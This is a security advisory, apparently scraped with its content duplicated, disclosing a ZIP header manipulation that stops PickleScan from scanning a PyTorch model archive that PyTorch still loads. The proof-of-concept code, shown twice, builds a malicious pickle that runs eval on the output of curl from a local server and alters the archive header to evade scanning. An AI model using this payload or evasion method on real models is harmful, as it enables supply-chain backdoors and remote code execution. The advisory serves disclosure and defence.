Headline

GHSA-7q5r-7gvp-wc82: Zip Exploit Crashes Picklescan But Not PyTorch

Summary

PickleScan is vulnerable to a ZIP archive manipulation attack that causes it to crash when attempting to extract and scan PyTorch model archives. By modifying the filename in the ZIP header while keeping the original filename in the directory listing, an attacker can make PickleScan raise a BadZipFile error. However, PyTorch’s more forgiving ZIP implementation still allows the model to be loaded, enabling malicious payloads to bypass detection.

Details

Python’s built-in zipfile module performs strict integrity checks when extracting ZIP files. If a filename stored in the ZIP header does not match the filename in the directory listing, zipfile.ZipFile.open() raises a BadZipFile error. PickleScan relies on zipfile to extract and inspect the contents of PyTorch model archives, making it susceptible to this manipulation.

PyTorch, on the other hand, has a more tolerant ZIP handling mechanism that ignores these discrepancies, allowing the model to load even when PickleScan fails. An attacker can exploit this behavior to embed a malicious pickle file inside a model archive, which PyTorch will load, while preventing PickleScan from scanning the archive.

PoC

import os
import torch

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, (f"eval \"$(curl -s http://localhost:8080)\"",)


model = RemoteCodeExecution()
file = "does_not_scan_but_opens_in_torch.pth"
torch.save(model, file)

# modify the header to cause the zip file to raise execution in picklescan
with open(file, "rb") as f:
    data = f.read()

# Replace only the first occurrence of "data.pkl" with "datap.kl"
modified_data = data.replace(b"data.pkl", b"datap.kl", 1)

# Write back the modified content
with open(file, "wb") as f:
    f.write(modified_data)

# Load the infected model
torch.load(file)

Impact

Severity: High

Who is impacted? Any organization or individual using PickleScan to detect malicious pickle files in PyTorch models.
What is the impact? Attackers can embed malicious payloads inside PyTorch model archives while preventing PickleScan from scanning them.
Potential Exploits: This technique can be used in supply chain attacks to distribute backdoored models via platforms like Hugging Face.

Recommendations

Use a More Tolerant ZIP Parser: PickleScan should handle minor ZIP header inconsistencies more gracefully instead of failing outright.
Detect Malformed ZIPs: Instead of crashing, PickleScan should log warnings and attempt to extract valid files.

3 months ago

ghsa

Open in Source

#vulnerability #google #backdoor

Summary

Details

PoC

import os
import torch

class RemoteCodeExecution:
    def __reduce__(self):
        return os.system, (f"eval \"$(curl -s http://localhost:8080)\"",)


model = RemoteCodeExecution()
file = "does_not_scan_but_opens_in_torch.pth"
torch.save(model, file)

# modify the header to cause the zip file to raise execution in picklescan
with open(file, "rb") as f:
    data = f.read()

# Replace only the first occurrence of "data.pkl" with "datap.kl"
modified_data = data.replace(b"data.pkl", b"datap.kl", 1)

# Write back the modified content
with open(file, "wb") as f:
    f.write(modified_data)

# Load the infected model
torch.load(file)

Impact

Severity: High

Who is impacted? Any organization or individual using PickleScan to detect malicious pickle files in PyTorch models.
What is the impact? Attackers can embed malicious payloads inside PyTorch model archives while preventing PickleScan from scanning them.
Potential Exploits: This technique can be used in supply chain attacks to distribute backdoored models via platforms like Hugging Face.

Recommendations

Use a More Tolerant ZIP Parser: PickleScan should handle minor ZIP header inconsistencies more gracefully instead of failing outright.
Detect Malformed ZIPs: Instead of crashing, PickleScan should log warnings and attempt to extract valid files.

References